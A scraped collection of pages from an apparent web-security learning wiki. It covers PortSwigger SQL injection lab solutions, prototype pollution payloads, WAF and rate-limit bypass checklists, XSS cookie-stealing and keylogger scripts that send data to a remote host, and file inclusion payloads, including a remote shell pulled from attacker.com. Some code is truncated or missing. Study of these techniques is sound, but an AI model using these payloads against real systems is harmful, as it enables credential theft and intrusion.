USERNAME\_CPHKFO,PASSWORD\_BQUKUN FROM USERS\_TAGNSD-- \`\`\` \#### SQL injection UNION attack, determining the number of columns returned by the query PortSwigger | free | easy | \[link to lab\](https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns) Solution \`\`\` 1. Keep adding null until you find the solution ' UNION SELECT null-- - ' UNION SELECT null,null-- - ' UNION SELECT null,null,null-- - etc \`\`\` \#### SQL injection UNION attack, finding a column containing text PortSwigger | free | easy | \[link to lab\](https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text) Solution \`\`\` 1. Find the number of columns ' UNION SELECT null,null,null-- 2. Test each column for text ' UNION SELECT 'a',null,null-- ' UNION SELECT null,'a',null-- ' UNION SELECT null,null,'a'-- 3. Substitute in the given text (or test with it initially) \`\`\` \#### SQL injection UNION attack, retrieving data from other tables PortSwigger | free | easy | \[link to lab\](https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables) Solution \`\`\` 1. Figure out the number of columns and then the version ' UNION SELECT null-- ' UNION SELECT null,null-- ' UNION SELECT version(),null-- 3. Get the table names ' UNION SELECT table\_name,null FROM information\_schema.tables-- users 4. Looks like to unique values so we can just grab the username and password and then login ' UNION SELECT username,password FROM users-- 5. Login as the administrator \`\`\` \#### SQL injection UNION attack, retrieving multiple values in a single column PortSwigger | free | easy | \[link to lab\](https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-multiple-values-in-single-column) Solution \`\`\` 1. Figure out the number of columns and which can return strings ' UNION SELECT null-- ' UNION SELECT null,null-- ' UNION SELECT 'a',null-- ' UNION SELECT null,'a'-- 2. Check the version of the DB and use CONCAT to grab the username and password ' UNION SELECT null,version()-- ' UNION SELECT null,username||password FROM users-- 3. Login with the administrator credentials to solve the lab \`\`\` \#### Blind SQL injection with conditional responses PortSwigger | free | medium | \[link to lab\](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses) Solution 1. Find the injectable point with the following payload and watching the Content-Length response header change ' AND 1=1-- ' AND 1=2-- 2. Get a working payload for SUBSTRING ' AND SUBSTRING('abc',1,1)='a'-- 3. Setup the payload to grab the administrators password ' AND SUBSTRING((SELECT password FROM users WHERE username='administrator'),1,1)<'m'-- 4. Setup intruder and mark the first '1' and the character to fuzz, set the attack type to cluster bomb ' AND SUBSTRING((SELECT password FROM users WHERE username='administrator'),§1§,1)='§m§'-- 5. Add the payloads a-z A-Z 0-9 for the first list, and 1-30 for the second 6. Start attack, when finished, filter by 'Welcome' 7. Login with 'administrator' and the password \#### Blind SQL injection with conditional errors PortSwigger | free | medium | \[link to lab\](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors) Solution \`\`\` 1. Find the injectable point with the following payload to create an error ' UNION SELECT CASE WHEN (1=2) THEN TO\_CHAR(1/0) ELSE NULL END FROM dual-- ' UNION SELECT CASE WHEN (1=1) THEN TO\_CHAR(1/0) ELSE NULL END FROM dual-- 2. Verify you can use SUBSTR to select the first character ' UNION SELECT CASE WHEN (SUBSTR((SELECT password FROM users WHERE username='administrator'),1,1)<'m') THEN TO\_CHAR(1/0) ELSE NULL END FROM dual-- Test with > and < and = to double check you can get 200 OK 3. Add the position markers and set the attack type to cluster bomb ' UNION SELECT CASE WHEN (SUBSTR((SELECT password FROM users WHERE username='administrator'),§1§,1)='§m§') THEN TO\_CHAR(1/0) ELSE NULL END FROM dual-- 4. Set the first list to 1-30. the second list to a-z 0-9 and run the attack 5. Filter out the 200 resuls and get the password 6. Login with 'administrator' and the password \`\`\` \#### Visible error-based SQL injection PortSwigger | free | medium | \[link to lab\](https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based) Solution \`\`\` 1. Find the injectable point with a single quote to trigger an error 2. Use the following payload to trigger a meaningful error and identify it as MSSQL ' AND SELECT CAST((SELECT password FROM users LIMIT 1) AS int)-- 3. We need to use a boolean expression ' AND CAST((SELECT 1) AS int)-- - ' AND CAST((SELECT 1) AS int)=1-- - 4. Select password from users ' AND CAST((SELECT password FROM users) AS int)=1-- - 5. Limit 1 (follow the error message) ' AND CAST((SELECT password FROM users LIMIT 1) AS int)=1-- - 6. Login to solve the lab \`\`\` \#### Blind SQL injection with time delays PortSwigger | free | medium | \[link to lab\](https://portswigger.net/web-security/sql-injection/blind/lab-time-delays) Solution \`\`\` 1. Find the injection point by trying different payloads along with AND, UNION and stacked queries ; ;SELECT pg\_sleep(10)-- - \*Remember to encode the ; otherwise your payload may be interpreted as another cookie \`\`\` \#### Blind SQL injection with time delays and information retrieval PortSwigger | free | medium | \[link to lab\](https://portswigger.net/web-security/sql-injection/blind/lab-time-delays-info-retrieval) Solution \`\`\` 1. Find the injection point with the sleep payload '; SELECT pg\_sleep(10)-- \*Remember to encode the ; 2. Verify a conditional time delay and create a payload '; SELECT CASE WHEN (1=1) THEN pg\_sleep(10) ELSE pg\_sleep(0) END '; SELECT CASE WHEN (username='administrator' AND SUBSTRING(password,§1§,1)='§a§') THEN pg\_sleep(10) ELSE pg\_sleep(0) END FROM users-- 3. Setup intruder as with the previous labs, select Columns and 'Response Received' List be the Response received column and the ones we want should be > 10,000 4. Login to solve the lab \`\`\` \#### Blind SQL injection with out-of-band interaction PortSwigger | free | medium | \[link to lab\](https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band) Solution \`\`\` 1. Find the injection point by fuzzing variations of the OOB payloads SELECT EXTRACTVALUE(xmltype(' %remote;\]>'),'/l') FROM dual-- SELECT UTL\_INADDR.get\_host\_address('BURP-COLLABORATOR-SUBDOMAIN')-- exec master..xp\_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'-- copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN' LOAD\_FILE('\\\\\\\\BURP-COLLABORATOR-SUBDOMAIN\\\\a') SELECT ... INTO OUTFILE '\\\\\\\\BURP-COLLABORATOR-SUBDOMAIN\\a'-- - ' UNION SELECT EXTRACTVALUE(xmltype(' %remote;\]>'),'/l') FROM dual-- \*Make sure to encode the payload otherwise you get 500 error 2. Go to 'Collaborator' and click poll now to see the results \`\`\` \#### Blind SQL injection with out-of-band data exfiltration PortSwigger | free | medium | \[link to lab\](https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band-data-exfiltration) Solution \`\`\` 1. Find the injection point by fuzzing variations of the OOB payloads ' UNION SELECT EXTRACTVALUE(xmltype(' %remote;\]>'),'/l') FROM dual-- \*Don't forget to encode the payload 2. Add a concatenated SELECT statement to the payload '||(SELECT+password+FROM+users+WHERE+username='administrator')||' ' UNION SELECT EXTRACTVALUE(xmltype(' %remote;\]>'),'/l') FROM dual-- 3. Clock poll now on collaborator after sending the request and login with the password that's passed as the subdomain \*The full address is shown at the bottom of the page in the description section \`\`\` \#### SQL injection with filter bypass via XML encoding PortSwigger | free | medium | \[link to lab\](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding) Solution \`\`\` 1. Find the injection point by passing in payloads such as 1+1 ' etc 2. Use Hackvertor to add a WAF bypass <@dec\_entities>1 UNION SELECT password FROM users<@/dec\_entities> 3. Login to solve the lab \`\`\` \--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists.md). # Wordlists - \[Single characters\](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/single-characters.md) - \[SQLi\](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/sqli.md) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/api-broken-authentication.md). # API: Broken authentication --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/api-broken-authentication.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/scripts/php-scripts/rce-function-check.md). # RCE Function Check If you can execute PHP on a target but want to figure out which functions are available to you to execute commands on the host, you can use this script. Link to gist: \`\`\` getMessage()}\\n"; } } else { echo "Function '{$func\_name}' disabled or not available.\\n"; } } foreach ($functions\_to\_test as $func) { test\_function($func, $test\_command); } ?> \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/scripts/php-scripts/rce-function-check.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis.md). # APIs A huge amount of internet traffic (over 80% according to Google) is API calls. Modern webapplications also often make use of APIs not just for calls to third party applications but for core functionality and communication between the client and server. It’s critical that we understand how to effectively enumerate and test APIs. I have published a course called Practical API Hacking that can be found on the TCM Academy. If you‘re curious about it feel free to check it out or drop a message on the TCM Discord if you want more info about it. {% embed url="" %} Feel free to checkout my course :) {% endembed %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution.md). # Prototype pollution ## What is it? Prototype Pollution is a vulnerability that occurs when an attacker manipulates the prototype of a JavaScript object. It exploits the dynamic nature of JavaScript, allowing an attacker to modify an object's structure and behavior. This vulnerability is unique to JavaScript environments due to the language's flexible object model, where prototypes are shared between all objects of the same type. Consequently, a change to the prototype is reflected across all instances, potentially affecting the application's behavior globally. There are mainly two types of Prototype Pollution: 1. \*\*Global Prototype Pollution\*\*: This involves manipulating JavaScript's built-in object prototypes, such as \`Object.prototype\`, \`Array.prototype\`, etc. It can lead to various forms of attacks, such as adding, modifying, or deleting properties and methods, affecting the entire application. 2. \*\*Local Prototype Pollution\*\*: This is more specific and involves manipulating the prototype of specific objects in the application. The impact is usually confined to the scope of those specific objects. It's important to note that due to its nature, Prototype Pollution can lead to other kinds of attacks like: \* Privilege escalation: By altering properties that control user privileges. \* Remote Code Execution: By changing methods or properties related to function execution. \* Denial of Service: By overloading methods or properties causing resource exhaustion. \* Bypassing security measures: By altering validation or security checks. For more details on Prototype Pollution see the relevant resources and child pages. ## Payloads \`\`\` # Simple \`\_\_proto\_\_\` Assignment (Key-Value) {"\_\_proto\_\_": {"test": true}} # Simple \`constructor.prototype\` Assignment (Key-Value) {"constructor": {"prototype": {"test": true}}} # Direct Property Assignment (Bracket Notation) {"\_\_proto\_\_\[test\]": true} # Direct Prototype Assignment (Dot Notation) {"\_\_proto\_\_.test": true} # Using \`constructor.prototype\` (Dot Notation) {"constructor.prototype.test": true} # Overwrite \`\_\_proto\_\_\` Object {"\_\_proto\_\_": "test"} # Empty Object Injection {"\_\_proto\_\_": {}} # Nullify Prototype {"\_\_proto\_\_": null} # Constructor Manipulation {"constructor": {"test": true}} # Prototype Chain Poisoning {"constructor": {"prototype": {"\_\_proto\_\_": {"test": true}}}} # Array Pollution {"\_\_proto\_\_": \[\]} # Function Prototype Pollution {"\_\_proto\_\_.constructor.prototype.test": true} # Recursive Prototype Chain {"\_\_proto\_\_.constructor.prototype.\_\_proto\_\_.test": true} # Boolean Prototype {"\_\_proto\_\_": {"constructor": {"prototype": {"test": true}}}} # Constructor Pollution via Function {"constructor": {"prototype": {"constructor": {"prototype": {"test": true}}}}} # Combination Payloads {"\_\_proto\_\_.test": true, "constructor.prototype.test": true} # \`\_\_proto\_\_\` Bracket Notation Assignment Object.\_\_proto\_\_\["test"\] = true # \`\_\_proto\_\_\` Dot Notation Assignment Object.\_\_proto\_\_.test = true # \`constructor.prototype\` Dot Notation Assignment Object.constructor.prototype.test = true # \`constructor.prototype\` Bracket Notation Assignment Object.constructor\["prototype"\]\["test"\] = true # Overwrite \`\_\_proto\_\_\` Object using JSON {"\_\_proto\_\_": {"test": true}} # \`\_\_proto\_\_\` with Specific Property {"\_\_proto\_\_.name":"test"} # Array Style Bracket Notation with \`\_\_proto\_\_\` x\[\_\_proto\_\_\]\[test\] = true # Dot Notation with \`\_\_proto\_\_\` x.\_\_proto\_\_.test = true # Bracket Notation with \`\_\_proto\_\_\` (short) \_\_proto\_\_\[test\] = true # Dot Notation with \`\_\_proto\_\_\` (short) \_\_proto\_\_.test = true # Query Parameter Pollution ?\_\_proto\_\_\[test\]=true \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/api-bfla.md). # API: BFLA --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/api-bfla.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/bypassing-controls/waf-bypasses.md). # WAF Bypasses \*\*Encoding Evasion\*\*: Use URL, Unicode, Base64, or other encodings to disguise payloads. \*\*HTTP Parameter Pollution\*\*: Manipulate parameters to exploit the way the WAF processes multi-instance parameters. (One of my favourite techniques!) \*\*Session Splicing\*\*: Divide the attack into multiple requests or sessions to disrupt the WAF's ability to correlate the events. \*\*Verb Tampering\*\*: Change the HTTP method (GET, POST, HEAD, etc.) to an unconventional one that the WAF might not inspect. \*\*Path Obfuscation\*\*: Include irrelevant path information that gets ignored by the server but confuses the WAF (like using directory traversal techniques). \*\*Query String Manipulation\*\*: Alter the query string with special characters or payloads that might be overlooked by the WAF. \*\*Header Manipulation\*\*: Modify HTTP headers such as \`User-Agent\`, \`Referer\`, or custom headers in ways that are not expected. \*\*Cookie Poisoning\*\*: Inject payloads into cookie values which may not be inspected or properly sanitized by the WAF. \*\*Content-Type Evasion\*\*: Use unusual or mismatched content-types in the HTTP header to bypass checks that are content-type specific. \*\*Extension Manipulation\*\*: Changing file extensions or using obscure ones to evade filters that inspect file names. \*\*Protocol-Level Evasion\*\*: Utilize discrepancies in protocol implementations (like ambiguous requests) that may be differently interpreted by the WAF and the target web server. \*\*Attack Obfuscation with Legitimate Requests\*\*: Mix in legitimate traffic with the attack traffic to reduce the anomaly score that might otherwise trigger the WAF. \*\*Bypassing with JavaScript\*\*: Use JavaScript to construct the final payload in the client-side browser, which may not be executed or recognized by the WAF. \*\*Using Comment Injection\*\*: Place comments within SQL statements or scripts to disrupt signature detection. \*\*Utilizing Server-Side Request Forgery (SSRF)\*\*: Exploit the server's functionality to make requests that bypass the WAF's rules. \*\*Timing Attacks\*\*: Execute actions with delays, leveraging the fact that some WAFs have a time window for rule execution. \*\*Ruleset Flaws\*\*: Exploit known weaknesses in the rulesets employed by popular WAFs, which are sometimes documented by security researchers. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/bypassing-controls/waf-bypasses.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions/limit-overrun.md). # Limit overrun ### Limit overrun Limit overrun race conditions are a type of race condition in web applications, where an attacker exploits the timing of actions to surpass predefined restrictions. This vulnerability occurs when multiple requests are processed simultaneously, potentially bypassing application limits or altering application state in unintended ways. \*\*A simple example:\*\* \* A vulnerable webapp uses coupons that can be applied once to a cart before checkout. \* There is a small time delay between when the coupon is checked to be valid, and when it becomes invalid. \* An attacker could exploit this by sending multiple requests simultaneously so that they are deemed valid until the coupon becomes invalid. ![](https://appsecexplained.gitbook.io/files/r1PtogKhOGOAZBTTebwC) Using the same voucher multiple times within the race window. Typical targets might include: \* Redeeming coupons multiple times \* Transferring funds in excess of the account balance \* Rating a product multiple times ### Other learning resources: \* PortSwigger's Web Security Academy: \### Writeups: \* \### Checklist: \* \[ \] Identify potentially vulnerable endpoints: \* \[ \] Impacts security \* \[ \] Collision potential --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions/limit-overrun.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/bypassing-controls/rate-limiting.md). # Rate limiting ## What is it? Rate limiting prevents us from sending large numbers of requests to a target. It can also be referred to as throttling. A simple example: \* An application has a login form \* When a request is made to login, the IP is saved and a counter assigned \* If more than 10 attempts are made within 1minute the IP is blocked ## Checklist \* \[ \] Can we identify how the rate-limiting is being applied? \* \[ \] Can we spoof the a header that's being used \* \[ \] \`X-Real-IP\` \* \[ \] \`X-Forwarded-For\` \* \[ \] \`X-Originating-IP\` \* \[ \] \`Client-IP\` \* \[ \] \`True-Client-IP\` \* \[ \] Can we use other user agents? \* \[ \] Can we use different cookies or session tokens? \* \[ \] Can we tamper with HTTP verbs \* \[ \] Can we decrease the frequency of requests and leave overnight? \* \[ \] Can we create legitimate-looking behaviour --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/bypassing-controls/rate-limiting.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/javascript-injection-xss.md). # JavaScript injection (XSS) ## What is it? Commonly known as cross-site scripting (XSS), JavaScript injection is where an attacker can inject arbitrary JavaScript to be executed. \*\*A simple example\*\* \* A vulnerable webapp allows users to post comments. \* When a user submits a comment, the website stores it and then displays it on the homepage without any validation or sanitization. \* An attacker could exploit this by posting \`\` to the site. \* When a user visits the homepage, the payload is executed in that users browser. \*\*Other learning resources:\*\* \* PortSwigger: \* OWASP: \*\*Writeups:\*\* \* Bullets ## Checklist \* \[ \] Is your input reflected in the response? \* \[ \] Can we inject HTML? \* \[ \] Are there any weaknesses in the Content Security Policy (CSP)? \* \[ \] Can we use events (e.g. onload, onerror)? \* \[ \] Are there any filtered or escaped characters? \* \[ \] Is your input stored and then later rendered? \* \[ \] Can you inject into non-changing values (e.g. usernames)? \* \[ \] Is any input collected from a third party (e.g. account information)? \* \[ \] Is the version of the framework or dependency vulnerable? ## Exploitation \`\`\`javascript alert(1) prompt(1) \`\`\` \`\`\`html \`\`\` \`\`\`javascript let cookie = document.cookie let encodedCookie = encodeURIComponent(cookie) fetch("https:///e?c=" + encodedCookie) \`\`\` \`\`\`javascript function logKey(event){ fetch("http:///e?c=" + event.key) } document.addEventListener('keydown', logKey); \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/javascript-injection-xss.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion.md). # File Inclusion ## What is it? File Inclusion vulnerabilities allow an attacker to include files on a server through the web browser. This can occur in two forms: Local File Inclusion (LFI) and Remote File Inclusion (RFI). LFI exploits enable attackers to read files on the server, while RFI allows attackers to execute arbitrary code by including remote files over the internet. \*\*A simple example\*\* \* A vulnerable web application has the endpoint /page?file={filename} \* When a request is made, the application dynamically includes the content of the file specified in the query parameter, for example, PHP's include() function: include($filename); \* If an attacker modifies {filename} to a path such as \`../../etc/passwd\` or a remote URL \`http://attacker.com/malicious.php\`, they can read sensitive files or execute malicious code. It's important to note that the specific impact and exploitation techniques can vary depending on server configuration, programming language, and application logic. File Inclusion vulnerabilities can lead to: \* Sensitive data exposure \* Remote code execution \* Cross-site scripting \*\*Other learning resources:\*\* \* \\\[To be updated\] \*\*Writeups:\*\* Have a good writeup & want to share it here? Drop me a message on LinkedIn. ## Checklist \* \[ \] What is the technology stack you're attacking? \* \[ \] What server-side language is being used (PHP, JSP, ASP, etc.) \* \[ \] Is the application running on a standard web server (Apache, Nginx, IIS)? \* \[ \] Identify potential injection points \* \[ \] URL parameters \* \[ \] Form fields \* \[ \] HTTP headers (e.g., Referer, User-Agent) \* \[ \] Test for Local File Inclusion (LFI) \* \[ \] Can you access local files? (e.g., ../../../etc/passwd) \* \[ \] Test with common Unix and Windows paths \* \[ \] Test for null byte injection (e.g., ../../../etc/passwd%00) \* \[ \] Test for Remote File Inclusion (RFI) \* \[ \] Can you include remote files? (e.g., ; \* \[ \] Test for protocol wrappers (e.g., php\\://, data://) \* \[ \] Is user input properly validated and sanitized? \* \[ \] Are only allow-listed files allowed to be included? \* \[ \] Is the application configured to disallow remote file inclusion? ## Exploitation// Some code \`\`\` # Basic LFI to read /etc/passwd ../../../../etc/passwd \`\`\` \`\`\` # RFI to execute a remote shell http://attacker.com/malicious.php \`\`\` \`\`\` # Using PHP wrappers to bypass restrictions php://filter/convert.base64-encode/resource=index.php \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP 